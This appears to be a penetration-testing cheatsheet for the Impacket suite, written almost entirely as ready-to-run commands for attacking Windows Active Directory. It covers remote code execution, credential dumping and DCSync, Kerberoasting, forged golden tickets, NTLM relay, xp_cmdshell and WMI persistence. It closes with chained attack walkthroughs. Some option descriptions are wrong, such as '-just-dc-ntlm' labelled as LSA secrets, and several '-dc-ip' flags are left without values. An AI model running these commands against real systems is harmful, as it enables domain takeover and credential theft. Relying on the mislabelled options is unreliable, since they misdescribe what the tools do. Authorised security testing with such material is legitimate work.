Skip to content

Impacket Suite

Impacket Suite Cheatsheet

Installation

Using pip 

pip install impacket

From GitHub (latest) 

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

Using pipx 

pipx install impacket

Authentication Methods

Password Authentication 

impacket-tool $domain/$username:$password@$target

NTLM Hash Authentication 

impacket-tool $domain/$username@$target -hashes :$ntlm_hash
impacket-tool $domain/$username@$target -hashes $lm_hash:$ntlm_hash

Kerberos Authentication 

export KRB5CCNAME=$ticket.ccache
impacket-tool $domain/$username@$target -k -no-pass

AES Key Authentication 

impacket-tool $domain/$username@$target -aesKey $aes_key

Remote Execution

psexec.py - Remote Command Execution

# With password
impacket-psexec $domain/$username:$password@$target

# With hash
impacket-psexec $domain/$username@$target -hashes :$ntlm_hash

# Execute specific command
impacket-psexec $domain/$username:$password@$target "whoami"

# With custom service name
impacket-psexec $domain/$username:$password@$target -service-name LUALL

# Using RemComSvc method
impacket-psexec $domain/$username:$password@$target -remcomsvc

smbexec.py - SMB-based Command Execution

# Basic usage
impacket-smbexec $domain/$username:$password@$target

# With hash
impacket-smbexec $domain/$username@$target -hashes :$ntlm_hash

# With specific share
impacket-smbexec $domain/$username:$password@$target -share ADMIN$

# Silent mode (no output)
impacket-smbexec $domain/$username:$password@$target -mode SERVER

wmiexec.py - WMI-based Command Execution

# Basic usage
impacket-wmiexec $domain/$username:$password@$target

# With hash
impacket-wmiexec $domain/$username@$target -hashes :$ntlm_hash

# Execute command without shell
impacket-wmiexec $domain/$username:$password@$target "systeminfo"

# With specific namespace
impacket-wmiexec $domain/$username:$password@$target -namespace root\\cimv2

# Debug mode
impacket-wmiexec $domain/$username:$password@$target -debug

atexec.py - Task Scheduler Execution

# Execute command via Task Scheduler
impacket-atexec $domain/$username:$password@$target "whoami"

# With hash
impacket-atexec $domain/$username@$target -hashes :$ntlm_hash "systeminfo"

dcomexec.py - DCOM-based Execution

# Using MMC20 method (default)
impacket-dcomexec -object MMC20 $domain/$username:$password@$target 'powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==' -silentcommand


# Using ShellWindows method
impacket-dcomexec $domain/$username:$password@$target -object ShellWindows

# Using ShellBrowserWindow method
impacket-dcomexec $domain/$username:$password@$target -object ShellBrowserWindow

# With hash
impacket-dcomexec $domain/$username@$target -hashes :$ntlm_hash

Credential Dumping

secretsdump.py - Dump Credentials

# Dump all secrets from DC
impacket-secretsdump $domain/$username:$password@$dc_ip

# Dump NTDS.dit (DCSync)
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc

# Dump specific user via DCSync
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc-user krbtgt

# Dump NTDS with history
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc -history

# Use VSS method
impacket-secretsdump $domain/$username:$password@$dc_ip -use-vss

# From local SAM and SYSTEM files
impacket-secretsdump -sam $sam_file -system $system_file LOCAL

# From NTDS.dit file
impacket-secretsdump -ntds $ntds_file -system $system_file LOCAL

# Output to file
impacket-secretsdump $domain/$username:$password@$dc_ip -outputfile credentials

# Dump LSA secrets only
impacket-secretsdump $domain/$username:$password@$target -just-dc-ntlm

# With Kerberos
export KRB5CCNAME=$ticket.ccache
impacket-secretsdump $domain/$username@$dc_ip -k -no-pass

mimikatz.py - Remote Mimikatz

# Run Mimikatz remotely
impacket-mimikatz $domain/$username:$password@$target

# With specific command
impacket-mimikatz $domain/$username:$password@$target -c "lsadump::sam"

reg.py - Remote Registry Operations

# Query registry key
impacket-reg $domain/$username:$password@$target query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key
impacket-reg $domain/$username:$password@$target add -keyName HKLM\\SOFTWARE\\Test

# Delete registry key
impacket-reg $domain/$username:$password@$target delete -keyName HKLM\\SOFTWARE\\Test

# Save hive
impacket-reg $domain/$username:$password@$target save -keyName HKLM\\SAM

SMB Operations

smbclient.py - SMB Client

# List shares
impacket-smbclient $domain/$username:$password@$target

# With hash
impacket-smbclient $domain/$username@$target -hashes :$ntlm_hash

# Connect to specific share
impacket-smbclient $domain/$username:$password@$target -share C$

# Execute local file on share
impacket-smbclient $domain/$username:$password@$target -file $commands.txt

smbserver.py - SMB Server

# Start SMB server
impacket-smbserver share_name /path/to/share

# With authentication
impacket-smbserver share_name /path/to/share -username $user -password $pass

# SMB2 support
impacket-smbserver share_name /path/to/share -smb2support

# With specific IP
impacket-smbserver share_name /path/to/share -ip $listen_ip

# Debug mode
impacket-smbserver share_name /path/to/share -debug

# With comment
impacket-smbserver share_name /path/to/share -comment "Test Share"

smbpasswd.py - Change SMB Password

# Change password
impacket-smbpasswd $domain/$username:$oldpassword@$target -newpass $newpassword

# With hash
impacket-smbpasswd $domain/$username@$target -hashes :$ntlm_hash -newpass $newpassword

Kerberos Attacks

GetTGT.py - Request TGT

# Request TGT with password
impacket-getTGT $domain/$username:$password

# Request TGT with hash
impacket-getTGT $domain/$username -hashes :$ntlm_hash

# Request TGT with AES key
impacket-getTGT $domain/$username -aesKey $aes_key

# Save to specific file
impacket-getTGT $domain/$username:$password -outputfile $username.ccache

# With domain controller IP
impacket-getTGT $domain/$username:$password -dc-ip $dc_ip

GetST.py - Request Service Ticket

# Request service ticket with TGT
export KRB5CCNAME=$username.ccache
impacket-getST -k -no-pass -spn cifs/$target.$domain $domain/$username

# With password
impacket-getST -spn cifs/$target.$domain $domain/$username:$password

# Impersonate user (S4U)
impacket-getST -spn cifs/$target.$domain -impersonate Administrator $domain/$service_account:$password

# Save ticket
impacket-getST -spn cifs/$target.$domain $domain/$username:$password -outputfile $service.ccache

GetNPUsers.py - ASREPRoasting

# Get AS-REP for users without pre-auth
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt

# With authentication
impacket-GetNPUsers $domain/$username:$password -request -dc-ip

# Output in John format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format john -dc-ip

# Output in Hashcat format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format hashcat -dc-ip

# Target specific user
impacket-GetNPUsers $domain/ -no-pass -user $target_user -dc-ip

# With DC IP
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -dc-ip $dc_ip

GetUserSPNs.py - Kerberoasting

# Get SPNs and TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request

# With hash
impacket-GetUserSPNs $domain/$username -hashes :$ntlm_hash -request

# Output in John format
impacket-GetUserSPNs $domain/$username:$password -request -format john -outputfile $hashes.txt

# Output in Hashcat format
impacket-GetUserSPNs $domain/$username:$password -request -format hashcat -outputfile $hashes.txt

# Target specific SPN
impacket-GetUserSPNs $domain/$username:$password -request-user $service_account

# With DC IP
impacket-GetUserSPNs $domain/$username:$password -request -dc-ip $dc_ip

ticketer.py - Golden/Silver Ticket Creation

# Create Golden Ticket
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# Create Silver Ticket
impacket-ticketer -nthash $service_hash -domain-sid $domain_sid -domain $domain -spn cifs/$target.$domain Administrator

# With specific user ID
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -user-id 500 Administrator

# With groups
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -groups 512,513,519 Administrator

# With duration
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -duration 365 Administrator

# With AES key
impacket-ticketer -aesKey $aes_key -domain-sid $domain_sid -domain $domain Administrator

ticketConverter.py - Convert Ticket Formats

# Convert kirbi to ccache
impacket-ticketConverter $ticket.kirbi $ticket.ccache

# Convert ccache to kirbi
impacket-ticketConverter $ticket.ccache $ticket.kirbi

LDAP Operations

ldapdomaindump.py - Dump LDAP Information

# Dump all LDAP info
ldapdomaindump $domain/$username:$password@$dc_ip

# With hash
ldapdomaindump $domain/$username@$dc_ip -hashes :$ntlm_hash

# Output to specific directory
ldapdomaindump $domain/$username:$password@$dc_ip -o /tmp/ldap_dump

# No JSON output
ldapdomaindump $domain/$username:$password@$dc_ip -no-json

# No grep-friendly output
ldapdomaindump $domain/$username:$password@$dc_ip -no-grep

GetADUsers.py - Enumerate AD Users

# Get all users
impacket-GetADUsers $domain/$username:$password

# With specific attributes
impacket-GetADUsers $domain/$username:$password -all

# With DC IP
impacket-GetADUsers $domain/$username:$password -dc-ip $dc_ip

# Debug mode
impacket-GetADUsers $domain/$username:$password -debug

Network Protocols

ntlmrelayx.py - NTLM Relay

# Basic relay to target
impacket-ntlmrelayx -t smb://$target

# With command execution
impacket-ntlmrelayx -t smb://$target -c "whoami"

# Relay to multiple targets
impacket-ntlmrelayx -tf $targets.txt

# With socks proxy
impacket-ntlmrelayx -t smb://$target -socks

# Dump SAM
impacket-ntlmrelayx -t smb://$target -dump-sam

# Interactive shell
impacket-ntlmrelayx -t smb://$target -i

# Specific SMB2 support
impacket-ntlmrelayx -t smb://$target -smb2support

# Relay to LDAP for shadow credentials
impacket-ntlmrelayx -t ldaps://$dc_ip --shadow-credentials --shadow-target $target$

# Relay to LDAP for RBCD
impacket-ntlmrelayx -t ldaps://$dc_ip --delegate-access

# Enumerate local admins
impacket-ntlmrelayx -tf $targets.txt -enum-local-admins

# With WPAD
impacket-ntlmrelayx -t smb://$target -wpad wpad.dat

responder.py (if included)

# Start Responder
responder -I eth0 -dwP

# Analyze mode
responder -I eth0 -A

# With specific poisoners
responder -I eth0 -r -d -w

# Fingerprint mode
responder -I eth0 -F

MS-RPC Operations

rpcdump.py - Enumerate RPC Endpoints

# Enumerate RPC endpoints
impacket-rpcdump $domain/$username:$password@$target

# With specific port
impacket-rpcdump $domain/$username:$password@$target -port 445

# With hash
impacket-rpcdump $domain/$username@$target -hashes :$ntlm_hash

samrdump.py - SAM Remote Dump

# Enumerate users via SAM-R
impacket-samrdump $domain/$username:$password@$target

# With specific port
impacket-samrdump $domain/$username:$password@$target -port 445

# With hash
impacket-samrdump $domain/$username@$target -hashes :$ntlm_hash

lookupsid.py - SID Bruteforce

# Enumerate SIDs
impacket-lookupsid $domain/$username:$password@$target

# With maximum RID
impacket-lookupsid $domain/$username:$password@$target -max-rid 4000

# With hash
impacket-lookupsid $domain/$username@$target -hashes :$ntlm_hash

# With domain SID
impacket-lookupsid $domain/$username:$password@$target -domain-sid $domain_sid

rpcmap.py - RPC Endpoint Mapper

# Map RPC endpoints
impacket-rpcmap 'ncacn_ip_tcp:$target'

# With authentication
impacket-rpcmap 'ncacn_ip_tcp:$target' -auth-type 1 -username $username -password $password

# List interfaces
impacket-rpcmap 'ncacn_ip_tcp:$target[135]'

Database Attacks

mssqlclient.py - MSSQL Client

# Connect to MSSQL
impacket-mssqlclient $domain/$username:$password@$target

# With Windows authentication
impacket-mssqlclient $domain/$username:$password@$target -windows-auth

# Execute OS command
impacket-mssqlclient $domain/$username:$password@$target -query "EXEC xp_cmdshell 'whoami'"

# With specific database
impacket-mssqlclient $domain/$username:$password@$target -db $database

# With hash
impacket-mssqlclient $domain/$username@$target -windows-auth -hashes :$ntlm_hash

# Enable xp_cmdshell
impacket-mssqlclient $domain/$username:$password@$target -enable-xp_cmdshell

WMI Operations

wmiquery.py - WMI Queries

# Execute WMI query
impacket-wmiquery $domain/$username:$password@$target "SELECT * FROM Win32_OperatingSystem"

# With specific namespace
impacket-wmiquery $domain/$username:$password@$target -namespace root\\cimv2 "SELECT * FROM Win32_Process"

# With hash
impacket-wmiquery $domain/$username@$target -hashes :$ntlm_hash "SELECT * FROM Win32_Service"

wmipersist.py - WMI Persistence

# Create WMI event subscription
impacket-wmipersist $domain/$username:$password@$target install -name "TestEvent" -command "cmd.exe /c calc.exe"

# Remove persistence
impacket-wmipersist $domain/$username:$password@$target remove -name "TestEvent"

# With hash
impacket-wmipersist $domain/$username@$target -hashes :$ntlm_hash install -name "TestEvent" -command "powershell.exe -enc $b64_payload"

Other Useful Tools

addcomputer.py - Add Computer Account

# Add computer account
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password

# With specific DC
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password -dc-ip $dc_ip

# With hash
impacket-addcomputer $domain/$username -hashes :$ntlm_hash -computer-name $computer$ -computer-pass $computer_password

# Delete computer
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -delete

exchanger.py - Exchange Privilege Escalation

# Escalate via Exchange
impacket-exchanger $domain/$username:$password@$exchange_server -rpc-hostname $exchange_name

findDelegation.py - Find Delegation

# Find delegation opportunities
impacket-findDelegation $domain/$username:$password

# With specific DC
impacket-findDelegation $domain/$username:$password -dc-ip $dc_ip

# With hash
impacket-findDelegation $domain/$username -hashes :$ntlm_hash

Get-GPPPassword.py - Extract GPP Passwords

# Extract GPP passwords
impacket-Get-GPPPassword $domain/$username:$password@$target

# With hash
impacket-Get-GPPPassword $domain/$username@$target -hashes :$ntlm_hash

# From local file
impacket-Get-GPPPassword -xmlfile $groups.xml

mqtt_check.py - MQTT Check

# Check MQTT service
impacket-mqtt_check $target

# With credentials
impacket-mqtt_check $target -username $username -password $password

rdp_check.py - RDP Check

# Check RDP
impacket-rdp_check $domain/$username:$password@$target

# With hash
impacket-rdp_check $domain/$username@$target -hashes :$ntlm_hash

services.py - Service Operations

# List services
impacket-services $domain/$username:$password@$target list

# Start service
impacket-services $domain/$username:$password@$target start -name $service_name

# Stop service
impacket-services $domain/$username:$password@$target stop -name $service_name

# Create service
impacket-services $domain/$username:$password@$target create -name $service_name -display $display_name -path $binary_path

# Delete service
impacket-services $domain/$username:$password@$target delete -name $service_name

# Change service config
impacket-services $domain/$username:$password@$target change -name $service_name -start-type auto

netview.py - Network View

# Enumerate network
impacket-netview $domain/$username:$password@$target

# List users
impacket-netview $domain/$username:$password@$target -users

# List shares
impacket-netview $domain/$username:$password@$target -shares

# List sessions
impacket-netview $domain/$username:$password@$target -sessions

# With specific target list
impacket-netview $domain/$username:$password -targets $targets.txt

Useful Attack Chains

Pass-the-Hash Attack Chain

# 1. Dump hashes
impacket-secretsdump $domain/$username:$password@$target -outputfile hashes

# 2. Use hash for authentication
impacket-wmiexec $domain/Administrator@$target -hashes :$admin_hash

# 3. Dump more credentials
impacket-secretsdump $domain/Administrator@$dc_ip -hashes :$admin_hash -just-dc

Kerberoasting Attack Chain

# 1. Find SPNs
impacket-GetUserSPNs $domain/$username:$password

# 2. Request TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request -outputfile hashes.txt

# 3. Crack offline with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

DCSync Attack Chain

# 1. Get domain admin privileges (various methods)
# 2. Perform DCSync
impacket-secretsdump $domain/$da_user:$da_password@$dc_ip -just-dc

# 3. Create golden ticket with krbtgt hash
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# 4. Use ticket
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec $domain/Administrator@$target -k -no-pass

NTLM Relay Attack Chain

# Terminal 1: Start relay
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# Terminal 2: Trigger authentication (various methods)
# Could use Responder, mitm6, PrinterBug, PetitPotam, etc.

# Terminal 3: Use SOCKS proxy
proxychains impacket-secretsdump $domain/$username@$target -no-pass

Important Notes

Common Variables:

  • $domain = Domain name (e.g., corp.local)
  • $username = Username
  • $password = Password
  • $target = Target IP or hostname
  • $dc_ip = Domain Controller IP
  • $ntlm_hash = NTLM hash (32 hex characters)
  • $lm_hash = LM hash (32 hex characters)
  • $krbtgt_hash = krbtgt NTLM hash
  • $domain_sid = Domain SID (e.g., S-1-5-21-...)
  • $ticket.ccache = Kerberos ticket file

Authentication Priority:

  1. Kerberos (-k with KRB5CCNAME environment variable)
  2. NTLM Hash (-hashes)
  3. Password
  4. AES Key (-aesKey)

Output Files:

  • SecretsDump: [target]_samhashes.txt, [target]_cached.txt, [target]_lsa.secrets
  • Kerberoasting: [service].tgs
  • ASREPRoasting: [user].asrep

Environment Variables: 

# For Kerberos authentication
export KRB5CCNAME=ticket.ccache

# For proxychains with SOCKS
export SOCKS_PROXY=127.0.0.1:1080

Tips:

  • Most tools support -debug flag for verbose output
  • Use -codec to specify encoding (useful for non-ASCII characters)
  • Many tools support -k -no-pass for Kerberos auth
  • Tools typically use port 445 (SMB) or 135 (RPC) by default
  • Add -ts for timestamps in output

Common Ports:

  • 88: Kerberos
  • 135: MS-RPC
  • 139: NetBIOS
  • 389: LDAP
  • 445: SMB
  • 464: Kerberos Password Change
  • 636: LDAPS
  • 1433: MSSQL
  • 3268: Global Catalog
  • 3389: RDP
  • 5985: WinRM HTTP
  • 5986: WinRM HTTPS